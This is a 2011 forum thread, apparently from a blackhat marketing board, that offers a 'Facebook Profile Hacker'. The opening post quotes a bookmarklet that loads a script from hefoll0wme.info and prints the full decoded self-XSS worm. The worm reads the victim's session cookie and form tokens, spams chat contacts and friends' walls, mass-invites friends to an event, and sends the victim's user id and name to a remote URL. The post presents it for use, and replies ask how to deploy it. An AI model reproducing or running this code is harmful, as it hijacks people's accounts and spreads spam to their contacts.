87.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

04-26-2011, 08:30 AM
Post: #1
[GET] Facebook Profile Hacker 2.0
[GET] Facebook Profile Hacker 2.0
This is not for NOOB, please use with caution

I was a little bored today and came to this page:



Code:
Code:
http://dumbfb.blogspot.com

You noticed this section:


Code:
Code:
javascript:(a=(b=document).createElement('script')).src='//hefoll0wme.info/checker2.js',b.body.appendChild(a);void(0)
It tricks visitors to paste that code in the address bar so they can inject the malicious javascript into FB and then spam their walls and their friend's walls also open Ajax Chat of Facebook and spam a message as well.

So I fully decoded this shit:


Code:
Code:
var randomnumber = Math['floor'](Math['random']() * 99999);
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
var url = 'http://hellobusters.blogspot.com?';
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
var ev = 'Hey everyone, \x0A\x0A  I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
var redirect = 'http://hefoll0wme.info/final.php';
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
var nfriends = 4000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect
            }, 500)
        }
    };
var doget = function (a, b, c) {
        var d = new XMLHttpRequest();
        d['open']('GET', a);
        d['onreadystatechange'] = function () {
            if (d['readyState'] == 4) {
                if (d['status'] == 200 and& b) {
                    b(d['responseText'])
                };
                if (c) {
                    c()
                }
            }
        };
        d['send']()
    };
doget('/', function (u) {
    var v = document['cookie']['match'](/c_user=(\d+)/)[1];
    var w = function (a) {
            return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
        };
    var x = function (a) {
            return a ? a['name'] : ''
        };
    var y = function (a) {
            out = '';
            for (var b in a) {
                out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
            };
            return out
        };
    var z = function (a, b, c, d) {
            var e = new XMLHttpRequest();
            e['open']('POST', a);
            e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            e['onreadystatechange'] = function () {
                if (e['readyState'] == 4) {
                    if (e['status'] == 200 and& c) {
                        c(e['responseText'])
                    };
                    if (d) {
                        d()
                    }
                }
            };
            e['send'](y(b))
        };
    var A = function () {
            var a = document['createElement']('div');
            a['style']['display'] = 'block';
            a['style']['position'] = 'absolute';
            a['style']['width'] = 100 + '%';
            a['style']['height'] = 100 + '%';
            a['style']['left'] = 0 + 'px';
            a['style']['top'] = 0 + 'px';
            a['style']['textAlign'] = 'center';
            a['style']['padding'] = '4px';
            a['style']['background'] = '#FFFFFF';
            a['style']['zIndex'] = 999999;
            a['innerHTML'] = '&nbsp;<br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
            document['body']['appendChild'](a)
        };
    var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (B) {
        comp = B[1]
    } else {
        comp = ''
    };
    var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    var E = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + y({
        userid: v,
        name: E,
        doclose: 1
    });
    A();
    if (eventdesc) {
        wf++;
        z('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (h) {
            var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
            var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(j, function (a) {
                var b = a['match'](/\{"uid":\d+,/g);
                var c = [];
                for (var d = 0; d < b['length']; d++) {
                    var e = b[d]['match'](/:(\d+),/)[1];
                    if (e != v) {
                        c['push'](e)
                    }
                };
                var f = new Date();
                f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
                datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
                timestr = f['getHours']() * 60;
                var g = {
                    post_form_id: C,
                    fb_dtsg: D,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: c['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                g['new'] = '';
                z('/events/create.php', g, false, function () {
                    mf(--wf)
                })
            })
        })
    };
    if (chatmessage) {
        wf++;
        z('/ajax/chat/buddy_list.php?__a=1', {
            user: v,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (a) {
            var b = a['substr'](9);
            var c = eval('(' + b + ')');
            var d = c['payload']['buddy_list'];
            for (var e in d['nowAvailableList']) {
                var f = Math['floor'](Math['random']() * 1335448958);
                var g = (new Date())['getTime']();
                var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
                z('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date())['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
                    to: e,
                    post_form_id: C,
                    fb_dtsg: D,
                    post_form_id_source: 'AsyncRequest'
                })
            };
            mf(--wf)
        })
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
            var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
            var i = [];
            if (h) {
                for (var j = 0; j < h['length']; j++) {
                    var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
                    var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
                    i['push']({
                        id: k,
                        name: l
                    })
                }
            };
            var n = [];
            var o = [];
            while (i['length']) {
                var p = Math['floor'](Math['random']() * i['length']);
                n['push'](i[p]);
                o['push'](i[p]);
                var q = i['shift']();
                if (p) {
                    i[p - 1] = q
                }
            };
            if (debug) {
                alert('fetched friends: ' + n['length'])
            };
            var r = {
                post_form_id: C,
                fb_dtsg: D,
                xhpc_composerid: comp,
                xhpc_targetid: v,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var s = n['pop']();
                mt = mt['replace']('%tf%', x(s));
                m = m['replace']('%tf%', w(s))
            };
            r['xhpc_message_text'] = mt;
            r['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt)
            };
            z('/ajax/updatestatus.php?__a=1', r);
            var t = function (a) {
                    if (a == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    var b = o['shift']();
                    var c = {
                        post_form_id: C,
                        fb_dtsg: D,
                        xhpc_composerid: comp,
                        xhpc_targetid: b['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var d = postmessage;
                    var e = postmessage;
                    if (n['length'] == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    while (d['search']('%tf%') >= 0) {
                        var f = n['pop']();
                        d = d['replace']('%tf%', x(f));
                        e = e['replace']('%tf%', w(f))
                    };
                    c['xhpc_message_text'] = d;
                    c['xhpc_message'] = e;
                    z('/ajax/updatestatus.php?__a=1', c);
                    setTimeout(function () {
                        t(a - 1)
                    }, 2000)
                };
            wf++;
            setTimeout(function () {
                t(nfriends)
            }, 2000)
        })
    };
    mf()
});
Enjoy!
04-26-2011, 08:59 AM
Post: #2
RE: [FREE] Facebook Profile Hacker 2.0
Just as you said This is not for NOOB, please use with caution

thanks for this
04-27-2011, 09:30 PM
Post: #3
RE: [FREE] Facebook Profile Hacker 2.0
is this the same trick as the blackhat "Auto Like" script where it auto like whoever goes to the link and automatically post a share in their respective FB?
Laid off.. Struggling financially.. any help to make money will be great!
04-30-2011, 08:56 AM
Post: #4
RE: [FREE] Facebook Profile Hacker 2.0
how can we use this to get traffic to a site????
05-01-2011, 07:46 AM
Post: #5
RE: [FREE] Facebook Profile Hacker 2.0
What is th point with this...??
66.gif
05-15-2011, 10:51 AM
Post: #6
RE: [FREE] Facebook Profile Hacker 2.0
How in the world would I be able to use this?
05-16-2011, 01:14 AM
Post: #7
RE: [FREE] Facebook Profile Hacker 2.0
i run and it's do nothing
05-22-2011, 08:11 PM
Post: #8
RE: [FREE] Facebook Profile Hacker 2.0
LOL http://dumbfb.blogspot.com it contains that viral script too -_-
07-08-2011, 01:14 PM
Post: #9
RE: [GET] Facebook Profile Hacker 2.0
Does this still work?
Gonna give this a try :)
07-23-2011, 05:36 PM
Post: #10
RE: [GET] Facebook Profile Hacker 2.0
didnt work for me :)
but thanks!
45.gif




83.gif